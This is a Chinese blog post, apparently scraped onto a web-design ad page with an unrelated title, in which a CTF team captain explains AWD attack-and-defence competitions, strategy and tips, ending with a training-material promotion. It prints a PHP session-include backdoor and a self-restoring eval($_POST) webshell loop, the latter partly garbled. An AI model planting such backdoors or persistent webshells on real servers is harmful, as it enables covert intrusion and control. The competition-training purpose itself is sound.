有域名的话怎么做网站万网归一什么时候启动
2026/2/8 11:09:27 网站建设 项目流程
有域名的话怎么做网站,万网归一什么时候启动,俄罗斯服务器网站,怎么做app推广Hello#xff0c;大家好#xff0c;我是Nu1L战队队长Veneno#xff0c;通过这篇文章说一下关于CTF线下赛的AWD模式(当然也有一些比赛是沙盒模式)#xff0c;以及身为一只Web狗的你如何在各位大佬们的手下存活:)可能没有技术干货#xff0c;大家勿喷:) 1-何为AWD Attack Wi…Hello大家好我是Nu1L战队队长Veneno通过这篇文章说一下关于CTF线下赛的AWD模式(当然也有一些比赛是沙盒模式)以及身为一只Web狗的你如何在各位大佬们的手下存活:)可能没有技术干货大家勿喷:)1-何为AWDAttack With Defence简而言之就是你既是一个hacker又是一个manager。比赛形式一般就是一个ssh对应一个web服务然后flag五分钟一轮各队一般都有自己的初始分数flag被拿会被拿走flag的队伍均分主办方会对每个队伍的服务进行checkcheck不过就扣分扣除的分值由服务check正常的队伍均分。2-AWD之出题人在这里暂且冒充下出题人QAQ0x01:题目类型1-出题人自己写的cms为了恶心然后加个so。2-常见或者不常见的cms。3-一些框架漏洞比如ph师傅挖的CI这种0x02:代码类型目前来说国内比赛依旧是php居多当然也会有一些别的比如pylua这种。0x03:题目漏洞类型1-sqli居多2-文件包含3-各种rce4-文件上传0x04:出题人思路为了不让你们这群赛棍把题秒了我直接放个未公开cms的0day把算了要不我自己加点东西。诶等等这样是不是有点难了再放几个比较简单的洞把直接在index.php或者web根目录下放个shell?3-如何攻击相信平日大家都做过渗透测试之类的而AWD模式的比赛其实跟日常的渗透测试有共同之处。0x01:如何拿flag一般来说就是以下两种模式1-是向内网一台机器发送http请求返回请求中包含flag。2-是例如/home目录下放置flag文件。0x02:一个web狗需要具备的一些东西大致有以下几点:1-快速的漏洞反应能力。因为有的时候一些比赛放的漏洞都是网上能查到的所以这个时候需要一个好的搜索技巧。或者是一些rce显而易见的那种。2-快速编写脚本的能力。因为大家的服务都是一样的而你如果能通过比如注入的方式拿到flag如果用hackbar一个个去弄显然不够优雅而且有时候特别会容易遗漏那么这个时候写个小py无疑是极好的。3-一个好的心态毕竟跟你同场竞技的都是各位大佬所以当你发现自己被打的时候心态不要崩一旦崩了就基本宣布gg了。0x03:当我们处于优势地位时除非处于那种绝对优势的时候我们可以什么都不在乎。当我们处于一个微弱优势时这个时候我们需要一个比较腹黑的思想比如说A队与B队只差了可能几百的分数而A队这个时候有B队的webshell那么如何把B队拖下水相信大家都懂。0x04:当我们处于劣势地位时首先还是那句话心态不要崩。其次因为web比较容易抓取流量所以即使我们被打我们也可以及时通过分析流量去查看别的队伍的payload从而进行反打。如果自己的服务器上被种了shell删除是肯定的但是要这样想如果给你种了shell那么这种一般是自动化脚本打的就意味着别的队伍也可能被种路径密码什么的都一样。4-如何防守其实防守更多看的是谁比较细心。0x01:比赛开始的时候比赛开始时当我们连上ssh的时候我们首先应该做的是把源码down下来及时做好备份。然后在尽量不违反主办方check的原则下挂上自己的waf。一般来说主办方可能会隔一段时间提供前一时段的流量也可能不会所以这个时候需要我们自己去抓流量。0x02:然后的工作当然是审计审计再审计。0x03:当发现被打时当发现自己被打时首先尝试还原以前的备份(记得备份当前)如果依然被打这个时候应该跟队友分好工查看抓取的流量以及查看服务器上是不是存在shell。5-一些小tips分享几个小例子以及自己的思路。0x01:如果自己拿到了FB当自己拿到fb的时候一定要淡定淡定淡定。首先我们测试的对象应该是NPC(或者本地)而不是其他队伍选手的服务因为你怎么知道人家没有流量经常会出现有的队伍拿到了fb结果不是拿的npc的自己的payload又被别的队伍拿到而碰巧拿到的队伍重放能力特别强就会出现一个尴尬的局面明明你拿的fb结果人家打的比你还凶。所以当拿到fb的时候写打全场的exp之前可以先打n多的混淆流量。0x02:特别熟悉的cms作为一只web狗如果看到wordpress那么第一个反应肯定是上wpscan。但是线下赛时候有的出题人放了一个最新版本的wp甚至插件也没有什么漏洞举两个自己打比赛的时候碰见过的例子:1-主办方放了一个wp然后每个队伍都有config备份文件以及phpmyadmin。这种情况下最机智的方法是靠你多年手速迅速下载其他队伍备份文件然后登陆phpmyadmin后拿别的队伍的shell最机智的方法不是去利用phpmyadmin写shell万一没权限不就白白耽误时间了。2-同样是最新版的wp也没有安装插件但是主办方在一个比较深的目录里放了一个任意文件上传绕过上传的方式也比较简单。0x03:一些比较有意思的backdoor比如下面这个有兴趣的话可以自己本地测试下:session_start();extract($_GET);if(preg_match(‘/[0-9]/’,$_SESSION[‘PHPSESSID’]))exit;if(preg_match(‘//|./’,$_SESSION[‘PHPSESSID’]))exit;include(ini_get(“session.save_path”).“/sess_”.$_SESSION[‘PHPSESSID’]);?0x04:一些有趣shell在github上有关于phpwebshell的一个项目有兴趣的同学可以搜一下。当然也有python的一些shell。在这里举一个最简单的例子:ignore_user_abort(true);set_time_limit(0);$file “veneno.php”;shell?phpeval(shell ?php eval(shell?phpeval(_POST[venenohi]);?;while (TRUE) {if (!file_exists($file)) {file_put_contents($file, $shell);}usleep(50);}?6-Ending参加了那么多线下赛以来个人感觉还是需要提高自己的代码审计能力以及自动化脚本的编写能力同时也会提醒自己在什么方面有短板。大体就说什么多因为可能是个经验帖所以并没有太多代码师傅们勿喷如果有什么问题可以加我微信(FHcherish)一起交流:)学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询